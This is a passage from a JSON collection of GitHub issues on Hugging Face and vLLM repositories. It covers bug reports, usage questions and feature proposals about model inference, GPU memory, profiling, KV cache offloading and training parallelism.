-1*2-1=-3, so that there are '-3' in the input of siglip embedding ", "url": "https://github.com/huggingface/lerobot/issues/2218", "state": "open", "labels": [ "bug", "question", "policies" ], "created_at": "2025-10-16T06:48:13Z", "updated_at": "2025-10-17T09:58:49Z", "user": "Tgzz666" }, { "repo": "huggingface/transformers", "number": 41640, "title": "AttributeError: BartTokenizerFast has no attribute image_token. Did you mean: 'mask_token'?", "body": "### System Info\n\nUbuntu\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nimport torch\nimport requests\nfrom PIL import Image\nfrom transformers import AutoProcessor, Florence2ForConditionalGeneration\n\n\nmodel = Florence2ForConditionalGeneration.from_pretrained(\n \"microsoft/Florence-2-large\",\n dtype=torch.bfloat16,\n)\nprocessor = AutoProcessor.from_pretrained(\"microsoft/Florence-2-large\")\n\nurl = \"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/transformers/tasks/car.jpg?download=true\"\nimage = Image.open(requests.get(url, stream=True).raw).convert(\"RGB\")\n\ntask_prompt = \"\"\ninputs = processor(text=task_prompt, images=image, return_tensors=\"pt\").to(model.device, torch.bfloat16)\n\ngenerated_ids = model.generate(\n **inputs,\n max_new_tokens=1024,\n num_beams=3,\n)\ngenerated_text = processor.batch_decode(generated_ids, skip_special_tokens=False)[0]\n\nimage_size = image.size\nparsed_answer = processor.post_process_generation(generated_text, task=task_prompt, image_size=image_size)\n\nprint(parsed_answer)\n```\n\n### Expected behavior\n\n```\n raise AttributeError(f\"{self.__class__.__name__} has no attribute {key}\")\nAttributeError: BartTokenizerFast has no attribute image_token. 
Did you mean: 'mask_token'?\n```", "url": "https://github.com/huggingface/transformers/issues/41640", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-16T06:34:02Z", "updated_at": "2025-10-17T09:00:36Z", "comments": 5, "user": "conceptofmind" }, { "repo": "huggingface/transformers.js", "number": 1439, "title": "Integration to a CLI application created using PKG", "body": "### Question\n\nI'm trying to bundle a Node.js CLI tool that uses `@xenova/transformers` into a single executable using [pkg](https://github.com/vercel/pkg).\n\nThe build works fine, but when I run the packaged executable, I get this error:\n```\nError: Cannot find module '../bin/napi-v3/linux/x64/onnxruntime_binding.node'\nRequire stack:\n- /snapshot/custom-cli/node_modules/onnxruntime-node/dist/binding.js\n- /snapshot/custom-cli/node_modules/onnxruntime-node/dist/backend.js\n- /snapshot/custom-cli/node_modules/onnxruntime-node/dist/index.js\n- /snapshot/custom-cli/dist/custom-cli.cjs\n```\n\n**Build command:**\n\n`webpack && pkg -t node18-linux -o custom-cli dist/custom-cli.cjs`\n\n**pkg config:**\n\n```\n\"pkg\": {\n \"assets\": [\n \"node_modules/onnxruntime-node/bin/napi-v3/**/onnxruntime_binding.node\"\n ]\n}\n```\n\n\n**Is it possible to give a custom absolute path for ONNX native bindings (something like this):** \n```\nimport { env } from \"@xenova/transformers\";\nenv.backends.onnx.customBindingPath = \"/custom-cli/onnxruntime_binding.node\";\n```\n\nthen the tool could:\n- Extract prebuilt binaries (onnxruntime_binding.node) from a known location (or GitHub ZIP)\n\n- Pass that custom path to @xenova/transformers / onnxruntime-node\n\n- Load correctly even when packaged by pkg\n", "url": "https://github.com/huggingface/transformers.js/issues/1439", "state": "open", "labels": [ "question" ], "created_at": "2025-10-16T05:30:32Z", "updated_at": "2025-10-26T23:32:41Z", "user": "JosephJibi" }, { "repo": "huggingface/lerobot", "number": 2216, "title": "gpu memory required to finetune pi05", "body": "I tried to finetune pi05 with an RTX A6000 (48GB) and got an insufficient-memory error. Does anyone know how much GPU memory is needed to finetune a pi05 policy?\n\nThanks,", "url": "https://github.com/huggingface/lerobot/issues/2216", "state": "open", "labels": [ "question", "policies", "performance" ], "created_at": "2025-10-16T04:46:21Z", "updated_at": "2025-12-22T07:42:45Z", "user": "jcl2023" }, { "repo": "vllm-project/vllm", "number": 26981, "title": "[Usage]: Does vllm support use TokensPrompt for Qwen3VL model", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nMy truncation strategy differs slightly from the standard approach (I wish to preserve the system prompt and the final suffix, only truncating the middle portion). It seems that the current version of vLLM does not support this, so I attempted to pass pre-processed token IDs along with mm_data as input, for example: TokensPrompt(prompt_token_ids=text[:self.max_model_length] + self.suffix_tokens, multi_modal_data=mm_data, mm_processor_kwargs=video_kwargs). \nHowever, I encountered an error.
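For the middle-truncation strategy described in the report above, a hedged sketch of the truncation itself (`TokensPrompt` is vLLM's documented token-level input type; the token values, lengths, and helper name here are made up for illustration). One caveat worth noting: for multimodal prompts the slice must not cut through image/video placeholder tokens, which may be exactly where the reported error comes from.

```python
from vllm.inputs import TokensPrompt

def truncate_middle(tokens: list[int], keep_prefix: int,
                    suffix_tokens: list[int], max_len: int) -> list[int]:
    """Keep the first keep_prefix tokens and the suffix; trim only the middle."""
    budget = max_len - keep_prefix - len(suffix_tokens)
    assert budget >= 0, "prefix and suffix alone exceed max_len"
    return tokens[:keep_prefix] + tokens[keep_prefix:keep_prefix + budget] + suffix_tokens

# Illustrative values; real ids would come from the model's processor.
text_tokens = list(range(10_000))
suffix_tokens = [1, 2]
prompt = TokensPrompt(
    prompt_token_ids=truncate_middle(text_tokens, keep_prefix=32,
                                     suffix_tokens=suffix_tokens, max_len=8192),
    # multi_modal_data={"video": ...},  # as in the report; omitted here
)
```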
Could you please advise on the correct way to use this?\n\n\"Image\"\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26981", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-16T03:22:09Z", "updated_at": "2025-10-27T03:33:53Z", "comments": 10, "user": "afalf" }, { "repo": "huggingface/lerobot", "number": 2214, "title": "Potential Scale Imbalance in smolVLA Embedding Pipeline", "body": "Hi, I noticed a potential scale inconsistency in the embedding pipeline.\n\nSpecifically, state_emb is not normalized, while both img_emb and lang_emb are explicitly scaled by math.sqrt(emb_dim):\nhttps://github.com/huggingface/lerobot/blob/a6ff3cfebb0304f2c378515dd30ea06fff8f473f/src/lerobot/policies/smolvla/modeling_smolvla.py#L591-L601\n\nIn practice, the numerical magnitude of img_emb tends to be much higher (often in the hundreds), while lang_emb and state_emb remain in the single-digit range. This discrepancy might cause the image features to dominate during multimodal fusion or attention.\n\nRelated code:\nhttps://github.com/huggingface/lerobot/blob/a6ff3cfebb0304f2c378515dd30ea06fff8f473f/src/lerobot/policies/smolvla/modeling_smolvla.py#L561-L566\n\nSuggestion:\nConsider adding a LayerNorm after img_emb (or before the multimodal fusion stage) to align the scale across modalities. This could improve stability during training and quantization.\n\n\u2014\nReported by Tank @ iMotion AI", "url": "https://github.com/huggingface/lerobot/issues/2214", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-16T02:11:24Z", "updated_at": "2025-10-17T11:29:36Z", "user": "kkTkk012" }, { "repo": "vllm-project/vllm", "number": 26964, "title": "[Bug]: Issue with Deepseek Reasoning parser with Qwen3 2507 chat templates", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\n# wget https://raw.githubusercontent.com/vllm-project/vllm/main/vllm/collect_env.py\n# For security purposes, please feel free to check the contents of collect_env.py before running it.\npython collect_env.py\n--2025-10-15 17:33:01-- https://raw.githubusercontent.com/vllm-project/vllm/main/vllm/collect_env.py\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.109.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 28050 (27K) [text/plain]\nSaving to: \u2018collect_env.py.2\u2019\n\ncollect_env.py.2 100%[===================================>] 27.39K --.-KB/s in 0s \n\n2025-10-15 17:33:01 (65.0 MB/s) - \u2018collect_env.py.2\u2019 saved [28050/28050]\n\n# # sh: 8: python: not found\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nI'm running vLLM as a docker container on an Unraid server. It is a backend to Open WebUI chat interface. The issue I see is that the reasoning block for Open WebUI is closing too early. According to this discussion on the Open WebUI git, I think it is because of the deepseek parser used as recommended by the model card. See this link: https://github.com/open-webui/open-webui/pull/16687\n\nHere is an example of the issue that I face: \n\n\"Image\"\n\nI think this is the place to raise this issue. Thanks so much!\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26964", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-16T00:39:12Z", "updated_at": "2025-10-20T17:47:02Z", "comments": 1, "user": "MikeNatC" }, { "repo": "vllm-project/vllm", "number": 26949, "title": "[Bug]: RuntimeError: CUDA driver error: invalid device ordinal when symmetric memory (symm_mem) is enabled in multi-GPU vLLM setup with 4H100 PCIe", "body": "### My current environment\n\nEnvironment:\nModel: RedHatAI/Llama-4-Scout-17B-16E-Instruct-FP8-dynamic\nvLLM Version: latest main (installed via pip)\nHardware: 4\u00d7 NVIDIA H100 PCIe (80GB)\nDriver: 550.xx\nCUDA: 12.2\nPyTorch: 2.4.0\nOS: Ubuntu 22.04\nLaunch Command:\npython3 -m vllm.entrypoints.api_server \\\n --model /ephemeral/huggingface/models--RedHatAI--Llama-4-Scout-17B-16E-Instruct-FP8-dynamic/snapshots/... \\\n --tensor-parallel-size 4 \\\n --gpu-memory-utilization 0.85 \\\n --kv-cache-dtype fp8_e4m3 \\\n --max-model-len 4000000 \\\n --max-num-seqs 16 \\\n --enable-prefix-caching \\\n --kv-events-config '{\"enable_kv_cache_events\": true, \"publisher\": \"zmq\", \"endpoint\": \"tcp://*:5557\"}'\n\n\n### bug\n\nRuntimeError: CUDA driver error: invalid device ordinal\n(EngineCore_DP0 pid=11546) ERROR [symm_mem.py:88] handle = torch_symm_mem.rendezvous(self.buffer, self.group.group_name)\n(EngineCore_DP0 pid=11546) ERROR WorkerProc failed to start\nRuntimeError: Engine core initialization failed. See root cause above. 
Failed core proc(s): {'EngineCore_DP0': 1}\n\nBehavior:\nWhen symm_mem is enabled (default) \u2192 fails with invalid device ordinal\nWhen symm_mem is disabled via --disable-symm-mem \u2192\n\u2705 vLLM engine starts\n\u274c No KV cache event logs (BlockStored, BlockRemoved, etc.)\n\u274c No prefix cache hit metrics\n\nWhat I\u2019ve Tried\n\nVerified all 4 GPUs visible via nvidia-smi\nConfirmed correct CUDA device indexing\nReduced tensor-parallel-size to 2 \u2192 same error\nChecked for NCCL initialization issues \u2014 none\nManually set CUDA_VISIBLE_DEVICES=0,1,2,3\nRebuilt PyTorch + vLLM from source with USE_SYMMETRIC_MEMORY=1 \u2014 same result\nQuestion:\nIs there a known compatibility issue between symmetric memory (torch_symm_mem) and H100 PCIe devices in multi-GPU setups?\nIf so, is there a fallback mechanism to preserve KV event publishing (--kv-events-config) when symmetric memory is disabled?\n\nThanks for looking into it.\n", "url": "https://github.com/vllm-project/vllm/issues/26949", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-15T22:08:34Z", "updated_at": "2025-12-25T03:42:49Z", "comments": 2, "user": "vadapallij" }, { "repo": "vllm-project/vllm", "number": 26940, "title": "[Feature]: Support `inf` value for burstiness in benchmarks", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nIn the benchmarks, the burstiness value is used in a gamma distribution to sample the delays between consecutive requests. \n```\ntheta = 1.0 / (current_request_rate * burstiness)\ndelay_ts.append(np.random.gamma(shape=burstiness, scale=theta))\n```\n\n[Theoretically ](https://en.wikipedia.org/wiki/Gamma_distribution)(and this is also what is observed in practice), the generated delays have `1.0 / current_request_rate` as their mean, and the spread is controlled by the burstiness. When the burstiness is high, we observe lower variance in the delay values, all values being closer to the mean `1.0 / current_request_rate`. When burstiness tends to infinity, we should observe a single generated delay, which is `1.0 / current_request_rate`. In practice, the `np.random.gamma` function generates `nan` results, so we need to manually condition on the `burstiness` value and append `1.0 / current_request_rate` to the list of delays when burstiness becomes infinite.\n\nSee the attached image for the mathematical proof\n\n\"Image\"\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26940", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-10-15T19:39:03Z", "updated_at": "2025-11-03T18:33:19Z", "comments": 0, "user": "sducouedic" }, { "repo": "vllm-project/vllm", "number": 26914, "title": "[Usage]: Why are no communication kernels visible in the collected profiling?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\nI collected a profile via llm.start_profile and stop_profile, but no communication kernels show up in kernel_details.\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here).
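On the profiling question above (no communication kernels in kernel_details): a hedged, standalone sketch assuming a CUDA setup. Communication kernels only appear in a trace when device-side (CUDA) activities are recorded and collectives actually run; under tensor_parallel_size=1 there are simply no communication kernels to record, while with TP > 1 they should appear as ncclDevKernel_* entries in each worker's trace.

```python
import torch
from torch.profiler import profile, ProfilerActivity

# Record both CPU and CUDA activity; without ProfilerActivity.CUDA,
# device-side kernels (including NCCL's ncclDevKernel_* collectives)
# never show up in the kernel tables.
with profile(activities=[ProfilerActivity.CPU, ProfilerActivity.CUDA]) as prof:
    x = torch.randn(1024, 1024, device="cuda")
    y = x @ x
    torch.cuda.synchronize()

print(prof.key_averages().table(sort_by="cuda_time_total", row_limit=5))
```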
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26914", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-15T13:38:14Z", "updated_at": "2025-10-15T13:38:14Z", "comments": 0, "user": "sheep94lion" }, { "repo": "vllm-project/vllm", "number": 26903, "title": "[Usage]: vLLM for video input", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of qwen2.5-vl or qwen2.5-omni. \n\nWhen I convert the video to base64 for api calls (e.g. openai format), I found that vLLM seems to use all the video frames by checking the number of prompt tokens.\n\nIs there any parameter similar to fps to control the sampling rate?\nOr do I need to sample the video externally well in advance, save it as video and then convert to base64?\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26903", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-15T09:29:23Z", "updated_at": "2025-12-11T03:26:33Z", "comments": 6, "user": "King-king424" }, { "repo": "huggingface/diffusers", "number": 12492, "title": "module transformers has no attribute CLIPFeatureExtractor", "body": "### System Info\n\nlatest main\n\n### Who can help?\n\n@SunMarc \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nfrom diffusers import AnimateDiffPipeline\n\npipe = AnimateDiffPipeline.from_pretrained(\"emilianJR/epiCRealism\")\n```\nerror:\n```\nTraceback (most recent call last):\n File \"\", line 1, in \n File \"/opt/venv/lib/python3.12/site-packages/huggingface_hub/utils/_validators.py\", line 89, in _inner_fn\n return fn(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqing/diffusers/src/diffusers/pipelines/pipeline_utils.py\", line 1024, in from_pretrained\n loaded_sub_model = load_sub_model(\n ^^^^^^^^^^^^^^^\n File \"/home/jiqing/diffusers/src/diffusers/pipelines/pipeline_loading_utils.py\", line 752, in load_sub_model\n class_obj, class_candidates = get_class_obj_and_candidates(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqing/diffusers/src/diffusers/pipelines/pipeline_loading_utils.py\", line 419, in get_class_obj_and_candidates\n class_obj = getattr(library, class_name)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqing/transformers/src/transformers/utils/import_utils.py\", line 1920, in __getattr__\n raise AttributeError(f\"module {self.__name__} has no attribute {name}\")\nAttributeError: module transformers has no attribute CLIPFeatureExtractor\n```\n\n\n\n### Expected behavior\n\nAs transformers deprecated FeatureExtractor classes in favor of ImageProcessor classes for image preprocessing. 
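One hedged workaround sketch for the CLIPFeatureExtractor AttributeError above (untested; it relies on diffusers' documented ability to override pipeline components via `from_pretrained` kwargs). The question that follows, about hub repos that still declare the deprecated class, is exactly the case it targets: load the modern image-processor class yourself so the deprecated name in the hub config is never resolved.

```python
from transformers import CLIPImageProcessor
from diffusers import AnimateDiffPipeline

# Load the image processor explicitly from the repo's feature_extractor folder
# (CLIPImageProcessor reads the same preprocessor_config.json), then hand it
# to the pipeline so diffusers skips the deprecated-class lookup.
feature_extractor = CLIPImageProcessor.from_pretrained(
    "emilianJR/epiCRealism", subfolder="feature_extractor"
)
pipe = AnimateDiffPipeline.from_pretrained(
    "emilianJR/epiCRealism", feature_extractor=feature_extractor
)
```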
How to handle models that already set FeatureExtractor in model hub like [emilianJR/epiCRealism](https://huggingface.co/emilianJR/epiCRealism/blob/main/feature_extractor/preprocessor_config.json#L11)?", "url": "https://github.com/huggingface/diffusers/issues/12492", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-15T08:26:05Z", "updated_at": "2025-11-03T05:02:54Z", "comments": 3, "user": "jiqing-feng" }, { "repo": "vllm-project/vllm", "number": 26858, "title": "[RFC]: Top-level CLI interface for KV cache offloading", "body": "### Motivation.\n\nCPU (and tier-2 storage) offloading is an important feature in many cases (multi-round QA, document analysis, agent workflow, and reinforcement learning). With the recent advancement in the offloading connector, we already have the vLLM native CPU offloading implemented via the connector API. Also, there are multiple community efforts to provide other offloading implementations (e.g., LMCache, Nixl storage, mooncake) via the same set of APIs.\n\nHowever, there is no clear documentation about how to configure the CPU offloading from the user's perspective. Right now, in order to enable CPU offloading, the user needs to pass a JSON string to `--kv-transfer-config`, which may create a huge mental barrier for new users. Therefore, it would be better to have a simple & clear user interface for users to enable CPU offloading. \n\n### Proposed Change.\n\n\nThis proposal contains two new command-line arguments:\n- `--kv-offloading-size`: a numeric value to control a global offloading buffer size (in GB). When TP > 1, this number should be the total size summed across all the TP ranks. (An alternative is the buffer size for each TP rank.)\n- `--kv-offloading-backend`: a string that specifies which offloading backend to use, such as \"native\", \"lmcache\", \"mooncake\", \"3fs\", or \"nixl\".\n\nThis will give enough clarity to most of the users who want to use the offloading feature, and should be extensible enough to new offloading backends and tier-2 storage.\n\n## Required changes\n\nTo implement this proposal, the following things are needed:\n- Add logic to parse the new CLI argument and store it into vllm config.\n- Add a new module to translate the `--kv-offloading-size` and `--kv-offloading-backend` to the corresponding KV connector config.\n- Add the documentation to the vLLM user guide.\n\n### Feedback Period.\n\n1~2 weeks\n\n### CC List.\n\n@simon-mo @orozery @njhill \n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26858", "state": "closed", "labels": [ "RFC" ], "created_at": "2025-10-15T00:11:15Z", "updated_at": "2025-11-01T07:17:08Z", "comments": 8, "user": "ApostaC" }, { "repo": "huggingface/diffusers", "number": 12485, "title": "How to enable Context Parallelism for training", "body": "Hi @a-r-r-o-w , I would like to ask you for tips on using Context Parallelism for distributed training.\n\n**Is your feature request related to a problem? 
Please describe.**\nHere is the minimal code for adapting Context Parallelism into diffusion model training\n\n```python\n# Diffusers Version: 0.36.0.dev0\nfrom diffusers.models._modeling_parallel import ContextParallelConfig\n\n# I have 8 GPUs in total\ncp_config = ContextParallelConfig(ring_degree=1, ulysses_degree=8)\nflux_transformer.enable_parallelism(config=cp_config)\n\nloss = train(flux_transformer)\naccelerator.backward(loss)\ngrad_norm = accelerator.clip_grad_norm_(flux_transformer.parameters(), args.max_grad_norm)\n```\n\nHowever, there is a bug:\n```bash\n[rank5]: Traceback (most recent call last):\n[rank5]: File \"/home/code/diffusers/flux/sft_flux.py\", line 1494, in \n[rank5]: main_with_cleanup(args)\n[rank5]: File \"/home/code/diffusers/flux/sft_flux.py\", line 1460, in main_with_cleanup\n[rank5]: main(args)\n[rank5]: File \"/home/code/diffusers/flux/sft_flux.py\", line 1216, in main\n[rank5]: grad_norm = accelerator.clip_grad_norm_(flux_transformer.parameters(), args.max_grad_norm)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/accelerate/accelerator.py\", line 2863, in clip_grad_norm_\n[rank5]: return torch.nn.utils.clip_grad_norm_(\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/nn/utils/clip_grad.py\", line 36, in _no_grad_wrapper\n[rank5]: return func(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/nn/utils/clip_grad.py\", line 222, in clip_grad_norm_\n[rank5]: _clip_grads_with_norm_(parameters, max_norm, total_norm, foreach)\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/nn/utils/clip_grad.py\", line 36, in _no_grad_wrapper\n[rank5]: return func(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/nn/utils/clip_grad.py\", line 155, in _clip_grads_with_norm_\n[rank5]: clip_coef = max_norm / (total_norm + 1e-6)\n[rank5]: ~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/_tensor.py\", line 39, in wrapped\n[rank5]: return f(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/_tensor.py\", line 1101, in __rdiv__\n[rank5]: return self.reciprocal() * other\n[rank5]: ^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/_compile.py\", line 53, in inner\n[rank5]: return disable_fn(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/_dynamo/eval_frame.py\", line 929, in _fn\n[rank5]: return fn(*args, **kwargs)\n[rank5]: ^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_api.py\", line 350, in __torch_dispatch__\n[rank5]: return DTensor._op_dispatcher.dispatch(\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_dispatch.py\", line 166, in dispatch\n[rank5]: self.redistribute_local_args(\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_dispatch.py\", line 303, in redistribute_local_args\n[rank5]: resharded_local_tensor = redistribute_local_tensor(\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_redistribute.py\", line 208, in 
redistribute_local_tensor\n[rank5]: new_local_tensor = partial_spec._reduce_value(\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/_ops/_math_ops.py\", line 126, in _reduce_value\n[rank5]: reduced_tensor = super()._reduce_value(tensor, mesh, mesh_dim)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/tensor/placement_types.py\", line 679, in _reduce_value\n[rank5]: return funcol.all_reduce(\n[rank5]: ^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/_functional_collectives.py\", line 175, in all_reduce\n[rank5]: group_name = _resolve_group_name(group, tag)\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: File \"/home/.local/lib/python3.11/site-packages/torch/distributed/_functional_collectives.py\", line 783, in _resolve_group_name\n[rank5]: return dmesh._dim_group_names[dim]\n[rank5]: ^^^^^^^^^^^^^^^^^^^^^^\n[rank5]: AttributeError: 'DeviceMesh' obj", "url": "https://github.com/huggingface/diffusers/issues/12485", "state": "closed", "labels": [], "created_at": "2025-10-14T21:48:35Z", "updated_at": "2025-10-15T20:33:30Z", "user": "liming-ai" }, { "repo": "vllm-project/vllm", "number": 26840, "title": "[Doc]: Update AWQ Guide", "body": "### \ud83d\udcda The doc issue\n\nSituation: AutoAWQ functionality was adopted by llm-compressor but vllm [docs](https://docs.vllm.ai/en/latest/features/quantization/auto_awq.html) point to AutoAWQ which is deprecated\n\n\n### Suggest a potential alternative/fix\n\n1) Update the [AutoAWQ guide](https://github.com/vllm-project/vllm/blob/main/docs/features/quantization/auto_awq.md) to use the [llm-compressor](https://github.com/vllm-project/llm-compressor/tree/2a6a0a34c8a57b6090b5fbac9c0659edf982185c/examples/awq) apis/flow\n2) Make sure to also update links in [quantization doc](https://github.com/vllm-project/vllm/blob/main/docs/features/quantization/README.md)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26840", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-10-14T20:02:21Z", "updated_at": "2025-11-03T15:39:12Z", "comments": 0, "user": "HDCharles" }, { "repo": "vllm-project/vllm", "number": 26838, "title": "[Performance]: RTX 6000 PRO - FP8 in sglang is faster", "body": "### Proposal to improve performance\n\nCan we have a discussion about the sglang FP8 performance vs VLLM performance - \n\nI'm able to get 133 tokens/sec with sglang GLM-4.5-Air-FP8 vs 78 tokens/sec in VLLM \n\n```PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True USE_TRITON_W8A8_FP8_KERNEL=1 SGL_ENABLE_JIT_DEEPGEMM=0 python -m sglang.launch_server --model /mnt/GLM-4.5-FP8/ --tp 4 --host 0.0.0.0 --port 5000 --mem-fraction-static 0.93 --context-length 128000 --enable-metrics --attention-backend flashinfer --tool-call-parser glm45 --reasoning-parser glm45 --served-model-name glm-4.5-air --chunked-prefill-size 8092 --enable-mixed-chunk --cuda-graph-max-bs 32 --kv-cache-dtype fp8_e5m2```\n\nIt is using TRITON \n\nI'm not able to achieve the same speed with VLLM with any methods - neither flashinfer, nor triton etc. 
- the maximum is always around 78 tokens/sec \n\n1) Any idea how to achieve the same 133 tokens/sec in vLLM using Triton and the same configuration as in sglang? \n2) Is it the CUTLASS design that makes it not as fast as Triton? \n\n\n\n\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26838", "state": "open", "labels": [ "performance" ], "created_at": "2025-10-14T19:41:14Z", "updated_at": "2025-12-29T14:52:57Z", "comments": 10, "user": "voipmonitor" }, { "repo": "vllm-project/vllm", "number": 26817, "title": "[Feature]: Add process_weights_after_loading to AttentionImpl", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nCurrently, in the `Attention` layer, we check if `process_weights_after_loading` exists and then call it conditionally, and after that we apply flashinfer-specific logic.\n\nInstead, we should just add a `process_weights_after_loading` method to AttentionImpl (no-op by default), call it from `Attention.process_weights_after_loading`, and override it in `FlashInferAttentionImpl`.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\nhttps://github.com/vllm-project/vllm/pull/23016#discussion_r2414787224\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26817", "state": "closed", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-10-14T15:59:54Z", "updated_at": "2025-10-16T15:02:31Z", "comments": 2, "user": "ProExpertProg" }, { "repo": "vllm-project/vllm", "number": 26806, "title": "[Usage]: MCP-USE with VLLM gpt-oss:20b via ChatOpenAI", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI am trying to create an agent using gpt-oss:20B with mcp-use. \n\nMost of the time the model returns \"Agent completed the task successfully.\", and only sometimes the proper output that is required.\n\n### code \n`vllm serve openai/gpt-oss-20b --max-model-len 100000 